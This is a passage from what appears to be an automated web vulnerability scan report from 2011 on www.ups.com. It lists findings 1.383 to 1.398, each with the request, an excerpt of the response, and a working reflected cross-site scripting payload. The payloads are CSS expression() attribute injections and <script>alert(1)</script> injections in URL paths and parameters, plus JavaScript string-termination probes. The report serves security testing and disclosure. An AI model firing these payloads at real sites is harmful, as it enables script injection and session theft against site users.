This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/usd4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f/en/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd4ac1"style="x:expression(alert(1))"17b4988c95f/en/shipping/time/service/index.html">
...[SNIP]...

1.383. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20 was submitted in the REST URL parameter 3. This input was echoed as 7b24d"style="x:expression(alert(1))"686e1186d20 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/en7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56193


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en7b24d"style="x:expression(alert(1))"686e1186d20/shipping/time/service/index.html">
...[SNIP]...

1.384. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71 was submitted in the REST URL parameter 2. This input was echoed as 27baa"style="x:expression(alert(1))"2e2ebd57b71 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54858


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us27baa"style="x:expression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html">
...[SNIP]...

1.385. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7 was submitted in the REST URL parameter 3. This input was echoed as eb749"style="x:expression(alert(1))"2d88e2596e7 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/eneb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb749"style="x:expression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html">
...[SNIP]...

1.386. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61 was submitted in the REST URL parameter 2. This input was echoed as ff296"style="x:expression(alert(1))"5ef14c9e61 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/usff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61/en/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61601


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usff296"style="x:expression(alert(1))"5ef14c9e61/en/siteguide/index.html">
...[SNIP]...

1.387. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17 was submitted in the REST URL parameter 3. This input was echoed as acee2"style="x:expression(alert(1))"ddaee83ec17 in the application's response.

This proof of concept shows that the input reaches the response unencoded inside a double-quoted attribute value: the payload's leading quote closes the value attribute, and the remainder adds a style attribute containing a CSS expression(), which older versions of Internet Explorer evaluate as JavaScript. Other browsers ignore expression(), so this particular payload is specific to Internet Explorer, although the unencoded reflection it relies on is not. The payload contains no < or > characters, so this finding does not show whether those are reflected unencoded as well, which would allow closing the tag and injecting markup that any browser executes.

Request

GET /content/us/enacee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enacee2"style="x:expression(alert(1))"ddaee83ec17/siteguide/index.html">
...[SNIP]...

1.388. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05 was submitted in the REST URL parameter 2. This input was echoed as c574d"style="x:expression(alert(1))"6d4bfc86b05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usc574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45580


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc574d"style="x:expression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html">
...[SNIP]...

1.389. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e was submitted in the REST URL parameter 3. This input was echoed as 743d0"style="x:expression(alert(1))"109bef8a77e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45619


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en743d0"style="x:expression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1">
...[SNIP]...

1.390. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13 was submitted in the REST URL parameter 2. This input was echoed as edee3"style="x:expression(alert(1))"fe6f25a0e13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usedee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46024


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usedee3"style="x:expression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html">
...[SNIP]...

1.391. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a378c"style%3d"x%3aexpression(alert(1))"1991f7ee758 was submitted in the REST URL parameter 3. This input was echoed as a378c"style="x:expression(alert(1))"1991f7ee758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena378c"style%3d"x%3aexpression(alert(1))"1991f7ee758/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena378c"style="x:expression(alert(1))"1991f7ee758/tracking/quantumview/index.html">
...[SNIP]...

1.392. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee59f"style%3d"x%3aexpression(alert(1))"0706a145c41 was submitted in the REST URL parameter 2. This input was echoed as ee59f"style="x:expression(alert(1))"0706a145c41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usee59f"style%3d"x%3aexpression(alert(1))"0706a145c41/en/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36647


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usee59f"style="x:expression(alert(1))"0706a145c41/en/tracking/tools/index.html">
...[SNIP]...

1.393. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5067b"style%3d"x%3aexpression(alert(1))"35b30889967 was submitted in the REST URL parameter 3. This input was echoed as 5067b"style="x:expression(alert(1))"35b30889967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en5067b"style%3d"x%3aexpression(alert(1))"35b30889967/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36686


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en5067b"style="x:expression(alert(1))"35b30889967/tracking/tools/index.html">
...[SNIP]...

1.394. http://www.ups.com/dropoff [WT.svl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae02b"><script>alert(1)</script>38862b532a9 was submitted in the WT.svl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=en_US&WT.svl=ae02b"><script>alert(1)</script>38862b532a9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30396


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=ae02b"><script>alert(1)</script>38862b532a9&loc=en_US" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.395. http://www.ups.com/dropoff [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee95c"><script>alert(1)</script>d2cceec571c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=ee95c"><script>alert(1)</script>d2cceec571c&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30397


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=PriNav&loc=ee95c"><script>alert(1)</script>d2cceec571c" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.396. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d3d2"><script>alert(1)</script>ec5ea0bf3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30381


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.397. https://www.ups.com/account/am/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 129ef%0a3d98201dc8b was submitted in the REST URL parameter 2. This input was echoed as 129ef
3d98201dc8b
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am129ef%0a3d98201dc8b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am129ef
3d98201dc8b
/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am129ef

...[SNIP]...

1.398. https://www.ups.com/account/am/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31909'%3bb572ec76daa was submitted in the REST URL parameter 2. This input was echoed as 31909';b572ec76daa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am31909'%3bb572ec76daa/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
